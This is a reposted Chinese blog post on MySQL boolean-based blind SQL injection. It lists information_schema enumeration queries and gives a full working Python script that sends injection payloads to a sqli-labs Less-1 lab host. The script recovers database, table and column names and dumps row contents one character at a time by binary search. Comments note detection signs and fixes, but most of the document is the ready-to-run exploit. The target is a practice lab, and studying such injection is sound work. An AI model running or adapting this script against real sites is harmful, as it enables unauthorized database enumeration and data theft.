mysql bool盲注
2022-08-03 03:52:00 【[email protected]】
MySQL中查询所有数据库名和表名
1.查询所有数据库
show databases;
(select group_concat(schema_name ) from information_schema.schemata)
2.查询指定数据库中所有表名
(select group_concat(table_name) from information_schema.tables where table_schema=database())
3.查询指定表中的所有字段名
(select group_concat(column_name) from information_schema.columns where table_name='表名')
4.查询指定字段中的内容
(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)
group_concat(字段) from (表名)
import requests
from urllib.parse import quote
# Shared HTTP session; note that only Database_length() below actually uses it,
# the other probes call requests.get() directly.
session = requests.session()
# url = "http://61.147.171.105:62055/view.php?no=1"
url="http://35bc1ed6-1ac7-4e98-8a8f-becd773b3277.node4.buuoj.cn/Less-1/?id=1'" # the trailing single quote closes the original string literal; the injected clause is appended after it
# Crawler-style request headers
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
'Referer': "http://www.baidu.com/"
}
# Browser-style request headers (alternative, currently disabled)
# headers = {
# 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
# 'Referer': "https://creator.douyin.com/"
# }
# Marker string whose presence in the response body is treated as the query
# having evaluated TRUE. This is the whole "oracle" of a boolean-based blind
# injection: the server leaks one bit per request through a visible page
# difference. The server-side fix is to bind the id parameter instead of
# concatenating it into SQL; a secondary mitigation is to return identical
# pages for valid and invalid ids so no such marker exists.
success_text="Your Login name"
#爆当前数据库名长度
def Database_length() -> None:
    """Probe the length of the current database name.

    Sends ``length(database())=i`` for i in 1..9 and takes the first value
    whose response contains ``success_text``. Prints the length (0 if no
    value in that range matched) and returns nothing.

    This is the only probe in the file that goes through ``session``.
    From a monitoring standpoint the pattern is distinctive: a burst of
    requests to one endpoint whose query strings differ only by the
    compared integer.
    """
    database_length=0
    for i in range(1,10):
        payload = quote(" and length(database())="+str(i)+"#")  # URL-encode so ' ', '=' and '#' survive the query string
        text=session.get(url+payload,headers=headers).text
        if success_text in text:
            database_length=i
            break
    print("database_length:",database_length)
# 爆当前数据库名字
def Database_name() -> None:
    """Recover the current database name one character at a time.

    For each position ``i`` in 1..99 a binary search over ASCII 32..126 is
    run: an equality probe confirms the character, a greater-than probe
    narrows the bounds. Each matched character is appended and the partial
    name is printed. The outer loop runs over all 99 positions regardless
    of the real name length (nothing checks for end of string), and the
    inner ``while (1)`` only exits on an equality hit.

    Uses ``requests.get`` rather than the module-level ``session``, so no
    cookies are carried between probes.
    """
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe: is the i-th character exactly chr(mid)?
            payload1 =" and ascii(substr(database(), " + str(i) + ", 1)) = " + str(mid)+"#"
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            # Ordering probe: is the i-th character above chr(mid)?
            payload2 = quote(" and ascii(substr(database(), " + str(i) + ", 1)) > " + str(mid)+"#")
            text2 = requests.get(url+payload2 , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("database_name:", database_name)
# 爆数据库名
def Databases_names() -> None:
    """Recover the concatenated list of all schema names character by character.

    The target expression is ``group_concat(schema_name)`` over
    ``information_schema.schemata``; positions 1..999 are searched with the
    same equality / greater-than binary search as ``Database_name``.
    Partial output is printed after every matched character. Nothing stops
    the outer loop at the end of the concatenated string, and the inner
    ``while (1)`` exits only on an equality match.

    Queries against ``information_schema`` issued through an application
    account are a strong detection signal; restricting that account's
    privileges limits what a blind injection can enumerate.
    """
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # "%(i,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            # Ordering probe: move the lower or upper bound.
            payload2 = " and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # "%(i,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("databases_names:",databases_names)
# 爆表名
def Tables_name(database_name: str) -> None:
    """Recover the concatenated table names of one schema character by character.

    Args:
        database_name: schema name interpolated verbatim (unquoted apart from
            the surrounding single quotes) into the ``table_schema = '%s'``
            filter of the probe query.

    Same search procedure as ``Databases_names``: positions 1..999, binary
    search over ASCII 32..126, equality probe then greater-than probe, with
    the partial result printed on every hit. The outer loop does not stop at
    the end of the string and the inner loop exits only on an equality match.
    """
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d # "%(i,database_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            # Ordering probe: move the lower or upper bound.
            payload2 = " and (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d # "%(i,database_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("tables_names:",tables_name)
# 爆列名
def Columns_name(table_name: str) -> None:
    """Recover the concatenated column names of one table character by character.

    Args:
        table_name: table name interpolated verbatim into the
            ``table_name = '%s'`` filter of the probe query. No schema filter
            is applied, so same-named tables in other schemas contribute too.

    Same search procedure as ``Tables_name``. Note the final ``print`` label
    reads ``tables_names:`` although the value printed is the column list.
    """
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # "%(i,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            # Ordering probe: move the lower or upper bound.
            payload2 = " and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # "%(i,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("tables_names:",columns_name)  # label is inherited from Tables_name; the value is the column list
# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name: str, table_name: str, columns_name: str) -> None:
    """Recover the ``group_concat`` of one column character by character.

    Args:
        database_name: schema part of the ``FROM %s.%s`` target, interpolated
            unquoted.
        table_name: table part of the ``FROM %s.%s`` target, interpolated
            unquoted.
        columns_name: expression placed inside ``group_concat(%s)``,
            interpolated unquoted.

    Same binary-search procedure as the enumeration functions above;
    partial output is printed after each matched character. The outer loop
    runs to position 999 regardless of the data length and the inner loop
    exits only on an equality match.

    This is the step in which actual row data leaves the database. On the
    defending side the same countermeasures apply as for the enumeration
    probes: parameterized queries remove the injection point entirely, and
    a least-privilege application account limits which schemas are readable.
    """
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # "%(columns_name,i,database_name,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            # Ordering probe: move the lower or upper bound.
            payload2 = " and (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # "%(columns_name,i,database_name,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("dump:",dump)
# Probe the current database name length
# Database_length()
# Probe the current database name
# Database_name()
# Enumerate all database names
# NOTE: this call runs at import time; the module has no __main__ guard.
Databases_names()
# Enumerate the table names of the given database
# Argument: database name
# Tables_name("security")
# Enumerate the column names of the given table
# Argument: table name
# Columns_name("emails")
# Dump the contents of the given database / table / column
# Dump("security","users","username")
版权声明
本文为[[email protected]]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_61774705/article/details/126119974